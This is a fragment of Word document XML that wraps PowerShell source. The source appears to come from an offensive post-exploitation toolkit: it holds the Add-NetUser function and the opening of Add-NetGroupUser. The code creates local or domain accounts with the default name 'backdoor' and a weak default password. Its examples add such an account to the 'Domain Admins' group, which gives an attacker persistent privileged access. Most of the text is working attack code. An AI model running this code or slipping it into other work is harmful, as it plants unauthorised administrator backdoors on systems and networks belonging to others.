    <w:p w14:paraId="3666DA13" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="22C8CE7D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Add-NetUser -UserName john -Password 'Password123!'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA6651C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66819286" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Adds a localuser 'john' to the local machine with password of 'Password123!'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DF1718" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7085A338" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D3A1B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3EEED100" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Add-NetUser -UserName john -Password 'Password123!' -ComputerName server.testlab.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD4D4B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F0BFDB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Adds a localuser 'john' with password of 'Password123!' to server.testlab.local's local Administrators group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFCEC89" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="010AEB30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AED4960" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1C24B442" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Add-NetUser -UserName john -Password password -GroupName "Domain Admins" -Domain ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472411E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCF4C14" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Adds the user "john" with password "password" to the current domain and adds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A6812C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        the user to the domain group "Domain Admins"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B629A9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="41690678" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752A0DC5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="695F3926" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Add-NetUser -UserName john -Password password -GroupName "Domain Admins" -Domain 'testing'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052046F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424E40C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Adds the user "john" with password "password" to the 'testing' domain and adds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F16DE3D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        the user to the domain group "Domain Admins"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B58B7DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="55922366" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6264EDE6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="55077555" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        http://blogs.technet.com/b/heyscriptingguy/archive/2010/11/23/use-powershell-to-create-local-user-accounts.aspx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2D237C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B70B36" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1935F52E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460BA207" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4753C8D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744D12A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD1B177" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserName = 'backdoor',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4691F494" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="68609D24" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7963F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FBE3AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Password = 'Password123!',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5A367F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="05E96707" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6622368E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4993DC92" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GroupName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4881B7F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="337B39ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1969FF9C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('HostName')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127FB43B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4831E385" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName = 'localhost',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF245F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3573476F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22884F55" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625839D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAF84EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018B9587" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="62F40148" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if ($Domain) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E20B90" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0BE2618B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainObject = Get-NetDomain -Domain $Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C4B6E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if(-not $DomainObject) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A8EE71" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Warning "Error in grabbing $Domain object"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D045EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            return $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B17B658" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BB239C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1152091E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # add the assembly we need</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13347787" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Add-Type -AssemblyName System.DirectoryServices.AccountManagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDA2F49" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7354FB07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2F30E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # get the domain context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137312F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain), $DomainObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AB3E6F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="048704B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # create the user object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACC9288" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList $Context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251E5223" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1741BD51" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        # set user properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50089388" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $User.Name = $UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7410B0B4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $User.SamAccountName = $UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F57E399" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $User.PasswordNotRequired = $False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C34850" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $User.SetPassword($Password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B9F5D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $User.Enabled = $True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5018E53D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="661F2E79" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "Creating user $UserName to with password '$Password' in domain $Domain"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5546C593" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="17168EA4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576AF52E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # commit the user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4CCA1E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $User.Save()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F2A3A9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            "[*] User $UserName successfully created in domain $Domain"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087D5E2B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C924DF2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C50AD7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Warning '[!] User already exists!'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593DB059" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA322CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437AA521" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531DC598" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3832338F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F0B888" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "Creating user $UserName to with password '$Password' on $ComputerName"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E43377" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5E973206" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # if it's not a domain add, it's a local machine add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6966E931" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ObjOu = [ADSI]"WinNT://$ComputerName"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0CF4EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ObjUser = $ObjOu.Create('User', $UserName)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081C6F02" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ObjUser.SetPassword($Password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DB4378" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="07B81EBA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # commit the changes to the local machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7F67AA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB8B109" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Null = $ObjUser.SetInfo()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576C7CA9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            "[*] User $UserName successfully created on host $ComputerName"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F749CA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D6C7E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBF32E6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Warning '[!] Account already exists!'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28105675" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D18320" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A01414" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152F189D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4ACFEE3D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # if a group is specified, invoke Add-NetGroupUser and return its value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F384A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if ($GroupName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3418F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # if we're adding the user to a domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAE749B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($Domain) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBC0C9D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Add-NetGroupUser -UserName $UserName -GroupName $GroupName -Domain $Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3CC69D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            "[*] User $UserName successfully added to group $GroupName in domain $Domain"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699C5E3B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED7FE89" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # otherwise, we're adding to a local group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4CA656" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A95FF8B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Add-NetGroupUser -UserName $UserName -GroupName $GroupName -ComputerName $ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57794A37" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            "[*] User $UserName successfully added to group $GroupName on host $ComputerName"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63210E33" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062A9BCA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA73F05" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2963DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="30E89583" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="65BC8AF8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Add-NetGroupUser {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2C37C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746434B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43473A81" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1E9C419B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Adds a user to a domain group or a local group on the current (or remote) machine,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8D8982" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
